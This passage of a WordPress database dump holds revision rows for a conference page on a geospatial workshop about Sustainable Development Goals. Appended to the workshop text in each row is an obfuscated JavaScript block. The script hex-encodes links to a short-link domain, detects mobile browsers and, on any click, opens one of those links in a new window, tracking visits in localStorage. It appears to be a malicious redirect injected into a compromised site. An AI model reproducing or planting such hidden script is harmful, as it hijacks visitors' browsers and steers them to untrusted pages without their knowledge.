)|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','The Geospatial Information and SDG Nexus: GI4SDGs','','inherit','closed','closed','','2768-revision-v1','','','2022-10-13 23:51:23','2022-10-13 23:51:23','',2768,'https://gsw2023.com/?p=2781',0,'revision','',0),
(2782,1,'2022-10-13 23:53:03','2022-10-13 23:53:03','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2770\" img_size=\"1400x1000\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]</p>\n<h5 style=\"text-align:justify; color:black;\">In September 2015, the United Nations adopted “Transforming Our World: the 2030 Agenda for Sustainable Development” as a new ambitious global development plan with 17 Sustainable Development Goals (SDGs) and 169 targets. Recognizing the complex and diverse challenges the world is facing today, this agenda aims to end extreme poverty, fight inequality and injustice, and combat climate change. In order to ensure its successful implementation, the United Nations has been devoting to establishing a systematic follow-up and review of the progress towards SDGs at national, regional and global levels, through an indicator-based and data-driven monitoring approach.</h5>\n<h5 style=\"text-align:justify; color:black;\">Reliable and up-to-date geospatial data plays a fundamental role in the monitoring process, and the utilization of geospatial tools in SDGs monitoring has become a critical task for ISPRS and international geospatial communities. In the year 2019, ISPRS council has decided to set up a scientific program on “Geospatial Information-enabled SDGs Monitoring for the 2030 Agenda”, jointly with other international organizations. Its overreaching goal is to promote the best use of geospatial information in supporting SDGs monitoring and analysis through mobilizing and integrating all possible resources from ISPRS members and other stakeholders. The first ISPRS workshop on Geospatial Information for Sustainable Development Goals (GI4SDGs) was successfully organized in Changsha, China from Nov.19-20, 2019.</h5>\n<h5 style=\"text-align:justify; color:black;\">This second GI4SDGs workshop will provide an interdisciplinary platform to present the latest development and progress in the area of geospatial-enabled SDG monitoring and application. It will bring together people of different communities and disciplines, such as geomatics and remote sensing, environmental and urban studies, deep learning and service computing. Experts and users will present their novel and innovative methods to highlight successful case studies and to explore possible collaboration.</h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"blue\" style=\"shadow\" border_width=\"6\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h5 style=\"text-align: justify; color: red;\"><strong>The workshop will concentrate on the following topics:</strong></h5>\n<h6><strong>⦁ Opportunities and challenges of geospatial information-enabled SDGs;</strong></h6>\n<h6><strong>⦁ SDGs monitoring examples with geospatial perspective;</strong></h6>\n<h6><strong>⦁ Definition and modeling of geospatial essential variables for SDGs monitoring;</strong></h6>\n<h6><strong>⦁ Algorithms and methods for deriving geospatial essential variables, e.g., machine learning, big data analytics, cloud computing and other technologies;</strong></h6>\n<h6><strong>⦁ Global mapping initiatives and progresses at national and international levels;</strong></h6>\n<h6><strong>⦁ Integrating crowd-sourced data and VGI with geospatial data for SDGs monitoring;</strong></h6>\n<h6><strong>⦁ Developments and applications of geospatial knowledge service and collaborative platforms to meet SDGs assessment and monitoring;</strong></h6>\n<h6><strong>⦁ Ethical use of geospatial data and SDGs</strong></h6>\n<h6><strong>⦁ Other related topics.</strong></h6>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<h5 style=\"text-align: justify; color: red;\"><strong>The workshop plans to have the following four technical sessions:</strong></h5>\n<h6><strong>⦁ Session 1: Assessing SDGs progress by integrating geospatial and statistical information</strong></h6>\n<h6><strong>⦁ Session 2: Extracting Geospatial Information for SDGs</strong></h6>\n<h6><strong>⦁ Session 3: Monitoring SDGs with geospatially essential variables</strong></h6>\n<h6><strong>⦁ Session 4: ISPRS Scientific Program GI4SDGs: Progress and Collaboration</strong></h6>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"blue\" style=\"shadow\" border_width=\"5\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><strong>Workshop Chairs</strong></h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"blue\" border_width=\"6\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','The Geospatial Information and SDG Nexus: GI4SDGs','','inherit','closed','closed','','2768-revision-v1','','','2022-10-13 23:53:03','2022-10-13 23:53:03','',2768,'https://gsw2023.com/?p=2782',0,'revision','',0),
(2783,1,'2022-10-13 23:53:17','2022-10-13 23:53:17','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2770\" img_size=\"1400x1000\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]</p>\n<h5 style=\"text-align:justify; color:black;\">In September 2015, the United Nations adopted “Transforming Our World: the 2030 Agenda for Sustainable Development” as a new ambitious global development plan with 17 Sustainable Development Goals (SDGs) and 169 targets. Recognizing the complex and diverse challenges the world is facing today, this agenda aims to end extreme poverty, fight inequality and injustice, and combat climate change. In order to ensure its successful implementation, the United Nations has been devoting to establishing a systematic follow-up and review of the progress towards SDGs at national, regional and global levels, through an indicator-based and data-driven monitoring approach.</h5>\n<h5 style=\"text-align:justify; color:black;\">Reliable and up-to-date geospatial data plays a fundamental role in the monitoring process, and the utilization of geospatial tools in SDGs monitoring has become a critical task for ISPRS and international geospatial communities. In the year 2019, ISPRS council has decided to set up a scientific program on “Geospatial Information-enabled SDGs Monitoring for the 2030 Agenda”, jointly with other international organizations. Its overreaching goal is to promote the best use of geospatial information in supporting SDGs monitoring and analysis through mobilizing and integrating all possible resources from ISPRS members and other stakeholders. The first ISPRS workshop on Geospatial Information for Sustainable Development Goals (GI4SDGs) was successfully organized in Changsha, China from Nov.19-20, 2019.</h5>\n<h5 style=\"text-align:justify; color:black;\">This second GI4SDGs workshop will provide an interdisciplinary platform to present the latest development and progress in the area of geospatial-enabled SDG monitoring and application. It will bring together people of different communities and disciplines, such as geomatics and remote sensing, environmental and urban studies, deep learning and service computing. Experts and users will present their novel and innovative methods to highlight successful case studies and to explore possible collaboration.</h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"blue\" style=\"shadow\" border_width=\"6\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h5 style=\"text-align: justify; color: red;\"><strong>The workshop will concentrate on the following topics:</strong></h5>\n<h6><strong>⦁ Opportunities and challenges of geospatial information-enabled SDGs;</strong></h6>\n<h6><strong>⦁ SDGs monitoring examples with geospatial perspective;</strong></h6>\n<h6><strong>⦁ Definition and modeling of geospatial essential variables for SDGs monitoring;</strong></h6>\n<h6><strong>⦁ Algorithms and methods for deriving geospatial essential variables, e.g., machine learning, big data analytics, cloud computing and other technologies;</strong></h6>\n<h6><strong>⦁ Global mapping initiatives and progresses at national and international levels;</strong></h6>\n<h6><strong>⦁ Integrating crowd-sourced data and VGI with geospatial data for SDGs monitoring;</strong></h6>\n<h6><strong>⦁ Developments and applications of geospatial knowledge service and collaborative platforms to meet SDGs assessment and monitoring;</strong></h6>\n<h6><strong>⦁ Ethical use of geospatial data and SDGs</strong></h6>\n<h6><strong>⦁ Other related topics.</strong></h6>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<h5 style=\"text-align: justify; color: red;\"><strong>The workshop plans to have the following four technical sessions:</strong></h5>\n<h6><strong>⦁ Session 1: Assessing SDGs progress by integrating geospatial and statistical information</strong></h6>\n<h6><strong>⦁ Session 2: Extracting Geospatial Information for SDGs</strong></h6>\n<h6><strong>⦁ Session 3: Monitoring SDGs with geospatially essential variables</strong></h6>\n<h6><strong>⦁ Session 4: ISPRS Scientific Program GI4SDGs: Progress and Collaboration</strong></h6>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"blue\" style=\"shadow\" border_width=\"5\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><strong>Workshop Chairs</strong></h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"blue\" style=\"shadow\" border_width=\"6\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows 